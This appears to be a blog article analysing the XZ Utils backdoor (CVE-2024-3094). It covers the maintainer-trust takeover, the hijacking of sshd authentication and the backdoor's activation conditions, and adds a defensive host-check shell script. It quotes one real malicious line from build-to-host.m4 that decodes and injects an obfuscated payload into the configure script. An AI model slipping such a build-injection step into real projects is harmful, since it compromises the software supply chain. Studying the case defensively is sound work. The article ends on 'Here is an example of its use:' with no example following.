Hello everyone, in today's article we are going to discuss a case that has received a lot of attention in recent days: the vulnerability CVE-2024-3094, commonly called the “XZ backdoor”.
XZ Utils is an open source data compression tool present in almost all Linux distributions, which is used to compress large files into smaller, more manageable sizes for sharing. Being open source software, it is freely maintained and updated by volunteer developers.
These updates are added to the project through what are called “Pull Requests”, and before being admitted they are reviewed by other team members who have previously contributed to the project, in order to avoid errors in the proposed source code.
In this case, a GitHub user who contributed to the XZ project, named Jia Tan, managed to obtain permissions to review and accept code modifications, gaining the trust of the rest of the team and becoming able to accept his own contributions without them being reviewed by other members.
With this trust placed in his work by the team, Jia incorporated malicious code into the xz-utils project, with the intention of interfering with the authentication of the SSH service and allowing remote code execution (RCE).
Vulnerability explanation
It all started when Andrés Freund, a software engineer at Microsoft, noticed unusual behaviour in the sshd service, which was consuming a high amount of CPU.
Within the XZ build process, the “build-to-host.m4” script is executed. This script contains the following line of code:
gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
This line injects an obfuscated script at the end of the configure script, which is the script responsible for generating the Makefiles for xz-utils and liblzma.
The main objective of the injected script is to modify the liblzma Makefile so that, at runtime, the RSA_public_decrypt@....plt entry points to the malicious code of the backdoor.
During the sshd authentication process the RSA_public_decrypt@....plt function is invoked, causing the attacker's malicious code to be executed. This code is responsible for extracting the payload embedded in the public key passed during authentication, which is then subjected to a series of verification steps and signature checks. If the payload successfully passes these checks, it is handed to the libc system() function, which executes it and thereby achieves remote code execution (RCE).
The obfuscated code that runs within the configure script activates the backdoor only under certain conditions:
1. The target operating system must be Linux x86-64.
2. The XZ build process must be part of building a Debian or RPM package.
3. The binary that is invoked must be located at /usr/sbin/sshd.
4. The TERM environment variable must not be set.
5. The LD_DEBUG and LD_PROFILE environment variables must not be set either.
6. The LANG environment variable must be set (sshd sets it by default).
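As an added example (not code from the original article, nor the JFrog checker), the following POSIX shell script evaluates these activation conditions on a host from a defender's standpoint: the installed xz version, the platform, the sshd path and whether it links liblzma, and the environment variables. The function names are my own; the host checks assume a Linux host with xz, uname and ldd available.

```shell
#!/bin/sh
# Added example (not the article's code nor the JFrog checker): a defensive
# self-check for the activation conditions listed above. Function names are
# my own; host_report assumes a Linux host with xz, uname and ldd available.

# Returns 0 if VERSION is one of the two XZ Utils releases that shipped the backdoor.
is_backdoored_version() {
    case "$1" in
        5.6.0|5.6.1) return 0 ;;
        *) return 1 ;;
    esac
}

# Extracts "5.6.1" from the first line of `xz --version` ("xz (XZ Utils) 5.6.1").
xz_version_from_output() {
    printf '%s\n' "$1" | sed -n 's/^xz (XZ Utils) \([0-9][0-9.]*\).*/\1/p'
}

# Conditions 4-6: TERM, LD_DEBUG and LD_PROFILE unset, LANG set. Values are passed as
# arguments so they can be taken from sshd's own environment rather than this shell's.
env_allows_activation() {
    if [ -z "$1" ] && [ -z "$2" ] && [ -z "$3" ] && [ -n "$4" ]; then
        return 0
    fi
    return 1
}

# Conditions 1 and 3 plus the installed version. Condition 2 (xz built as a
# Debian or RPM package) is a build-time property; check it with the package manager.
host_report() {
    ver=$(xz_version_from_output "$(xz --version 2>/dev/null | head -n 1)")
    printf 'xz version: %s\n' "${ver:-not found}"
    if is_backdoored_version "$ver"; then
        echo 'RISK: xz 5.6.0/5.6.1 installed, update or downgrade through your distribution'
    fi
    case "$(uname -sm 2>/dev/null)" in
        'Linux x86_64') echo 'platform: Linux x86-64 (condition 1 holds)' ;;
        *) echo 'platform: not Linux x86-64 (condition 1 does not hold)' ;;
    esac
    if [ -x /usr/sbin/sshd ]; then
        echo 'sshd: found at /usr/sbin/sshd (condition 3 holds)'
        if ldd /usr/sbin/sshd 2>/dev/null | grep -q liblzma; then
            echo 'sshd: links liblzma, so a backdoored liblzma would be loaded into sshd'
        fi
    fi
    if env_allows_activation "$TERM" "$LD_DEBUG" "$LD_PROFILE" "$LANG"; then
        echo 'environment: conditions 4-6 hold in this shell'
    fi
}
host_report
```

The environment check is only meaningful against the environment sshd actually runs with, so on a live host read those four variables from the sshd process environment rather than from an interactive shell.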
Affected distributions
- Fedora 41 and Fedora Rawhide
- Kali Linux updated between March 26 and 29
- Alpine 5.6.0, 5.6.0-r0, 5.6.0-r1, 5.6.1, 5.6.1-r0 and 5.6.1-r1
- Arch Linux systems that have xz-utils version 5.6.0 or 5.6.1 installed
Additionally, to determine whether a vulnerable version of the xz-utils software has been installed, you can use the script created by the JFrog team, which can be found at the following link.
This checker is quite simple: it performs the six checks corresponding to the conditions listed above, which are necessary for this vulnerability to be exploitable. Here is an example of its use:
Thank you very much and until the next installment!